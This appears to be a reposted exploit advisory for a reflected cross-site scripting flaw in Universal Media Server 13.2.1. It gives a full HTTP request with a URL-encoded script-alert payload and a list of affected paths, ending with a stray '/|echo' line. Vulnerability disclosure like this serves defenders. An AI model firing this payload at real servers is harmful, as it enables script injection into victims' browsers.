Share
## https://sploitus.com/exploit?id=PACKETSTORM:171754
# Exploit Title: Universal Media Server 13.2.1 Cross Site Scripting   
# Google Dork: NA  
# Date: 01/04/2023  
# Exploit Author: Yehia Elghaly - Mrvar0x  
# Vendor Homepage: https://www.universalmediaserver.com/  
# Software Link: https://www.universalmediaserver.com/download/  
# Version: 13.2.1  
# Tested on: Windows 7 / 10  
# CVE: N/A  
  
  
Summary: Universal Media Server is a free DLNA, UPnP and HTTP/S Media Server.Support all major operating systems, with versions for Windows, Linux and macOS.  
  
Description: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: Reflected XSS found on the follwoing paths   
  
  
GET /%3Cscript%3Ealert('XSSYF')%3C/script%3E HTTP/1.1  
Host: 172.16.110.132:9001  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
[Affected Component]  
/  
/about  
/accounts  
/actions  
/logs  
/player  
/settings  
/shared  
/v1/api/about  
/|echo